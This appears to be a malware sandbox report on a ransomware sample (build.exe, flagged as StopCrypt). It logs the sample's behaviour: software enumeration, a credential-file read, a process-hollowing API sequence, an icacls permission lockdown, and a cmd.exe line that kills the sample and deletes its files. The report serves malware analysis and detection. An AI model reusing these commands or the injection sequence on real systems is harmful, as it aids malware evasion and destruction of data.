RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Reader 9 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Harvests credentials from local email clients (1 event)

file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini

Network activity contains more than one unique useragent (2 events)

process	build.exe				useragent	Microsoft Internet Explorer
process	build2.exe				useragent

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2440 called NtSetContextThread to modify thread in remote process 2524
Process injection	Process 2720 called NtSetContextThread to modify thread in remote process 2800
Process injection	Process 2920 called NtSetContextThread to modify thread in remote process 2972
NtSetContextThread July 19, 2021, 10:30 a.m.	registers.eip: 2004287940 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2524	1	0	0
NtSetContextThread July 19, 2021, 10:31 a.m.	registers.eip: 2004287940 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2800	1	0	0
NtSetContextThread July 19, 2021, 10:31 a.m.	registers.eip: 2004287940 registers.esp: 1638384 registers.edi: 0 registers.eax: 4634477 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2972	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (8 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2440 resumed a thread in remote process 2524
Process injection	Process 2524 resumed a thread in remote process 2720
Process injection	Process 2720 resumed a thread in remote process 2800
Process injection	Process 2920 resumed a thread in remote process 2972
NtResumeThread July 19, 2021, 10:30 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2524	1	0	0
NtResumeThread July 19, 2021, 10:31 a.m.	thread_handle: 0x000002bc suspend_count: 1 process_identifier: 2720	1	0	0
NtResumeThread July 19, 2021, 10:31 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2800	1	0	0
NtResumeThread July 19, 2021, 10:31 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2972	1	0	0

Uses suspicious command line tools or Windows utilities (1 event)

cmdline

icacls "C:\Users\test22\AppData\Local\057e0315-19ab-4b5f-ac0a-2ac31eb16c86" /deny *S-1-1-0:(OI)(CI)(DE,DC)

File has been identified by 25 AntiVirus engines on VirusTotal as malicious (25 events)

Elastic	malicious (high confidence)
FireEye	Generic.mg.e6bf9a1d8f14d2e1
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan ( 005690671 )
K7GW	Trojan ( 005690671 )
Cybereason	malicious.ff0761
Cyren	W32/Kryptik.EMQ.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
APEX	Malicious
Avast	FileRepMalware
Emsisoft	Trojan.Crypt (A)
Sophos	ML/PE-A
Gridinsoft	Trojan.Win32.Packed.lu!heur
Microsoft	Ransom:Win32/StopCrypt.MYK!MTB
Cynet	Malicious (score: 100)
Acronis	suspicious
Malwarebytes	MachineLearning/Anomalous.95%
SentinelOne	Static AI - Malicious PE
eGambit	Unsafe.AI_Score_93%
Fortinet	W32/GenKryptik.ERHN!tr
MaxSecure	Trojan.Malware.300983.susgen
AVG	FileRepMalware
CrowdStrike	win/malicious_confidence_100% (D)
Qihoo-360	HEUR/QVM10.1.AB77.Malware.Gen

Executed a process and injected code into it, probably while unpacking (28 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW July 19, 2021, 10:30 a.m.	thread_identifier: 2528 thread_handle: 0x0000007c process_identifier: 2524 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\build.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread July 19, 2021, 10:30 a.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection July 19, 2021, 10:30 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2524 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory July 19, 2021, 10:30 a.m.	process_identifier: 2524 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory July 19, 2021, 10:30 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2524 process_handle: 0x00000080	1	1
NtSetContextThread July 19, 2021, 10:30 a.m.	registers.eip: 2004287940 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2524	1	0
NtResumeThread July 19, 2021, 10:30 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2524	1	0
CreateProcessInternalW July 19, 2021, 10:30 a.m.	thread_identifier: 2668 thread_handle: 0x000002f8 process_identifier: 2664 current_directory: filepath: track: 1 command_line: icacls "C:\Users\test22\AppData\Local\057e0315-19ab-4b5f-ac0a-2ac31eb16c86" /deny *S-1-1-0:(OI)(CI)(DE,DC) filepath_r: stack_pivoted: 0 creation_flags: 72 (DETACHED_PROCESS\|IDLE_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000308	1	1
CreateProcessInternalW July 19, 2021, 10:30 a.m.	thread_identifier: 2724 thread_handle: 0x000002bc process_identifier: 2720 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\build.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002c4	1	1
NtResumeThread July 19, 2021, 10:31 a.m.	thread_handle: 0x000002bc suspend_count: 1 process_identifier: 2720	1	0
CreateProcessInternalW July 19, 2021, 10:31 a.m.	thread_identifier: 2804 thread_handle: 0x0000007c process_identifier: 2800 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\build.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread July 19, 2021, 10:31 a.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection July 19, 2021, 10:31 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2800 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory July 19, 2021, 10:31 a.m.	process_identifier: 2800 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory July 19, 2021, 10:31 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2800 process_handle: 0x00000080	1	1
NtSetContextThread July 19, 2021, 10:31 a.m.	registers.eip: 2004287940 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2800	1	0
NtResumeThread July 19, 2021, 10:31 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2800	1	0
CreateProcessInternalW July 19, 2021, 10:31 a.m.	thread_identifier: 2924 thread_handle: 0x000002cc process_identifier: 2920 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe" filepath_r: C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002c4	1	1
CreateProcessInternalW July 19, 2021, 10:31 a.m.	thread_identifier: 2976 thread_handle: 0x0000007c process_identifier: 2972 current_directory: filepath: C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe" filepath_r: C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread July 19, 2021, 10:31 a.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection July 19, 2021, 10:31 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2972 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory July 19, 2021, 10:31 a.m.	process_identifier: 2972 region_size: 659456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory July 19, 2021, 10:31 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2972 process_handle: 0x00000080	1	1
NtSetContextThread July 19, 2021, 10:31 a.m.	registers.eip: 2004287940 registers.esp: 1638384 registers.edi: 0 registers.eax: 4634477 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2972	1	0
NtResumeThread July 19, 2021, 10:31 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2972	1	0
CreateProcessInternalW July 19, 2021, 10:31 a.m.	thread_identifier: 2316 thread_handle: 0x00000590 process_identifier: 2324 current_directory: C:\ProgramData filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe" & del C:\ProgramData\*.dll & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000059c	1	1
CreateProcessInternalW July 19, 2021, 10:31 a.m.	thread_identifier: 2480 thread_handle: 0x00000084 process_identifier: 2500 current_directory: C:\ProgramData filepath: C:\Windows\System32\taskkill.exe track: 1 command_line: taskkill /im build2.exe /f filepath_r: C:\Windows\system32\taskkill.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW July 19, 2021, 10:31 a.m.	thread_identifier: 2676 thread_handle: 0x00000088 process_identifier: 2680 current_directory: C:\ProgramData filepath: C:\Windows\System32\timeout.exe track: 1 command_line: timeout /t 6 filepath_r: C:\Windows\system32\timeout.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1

build.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All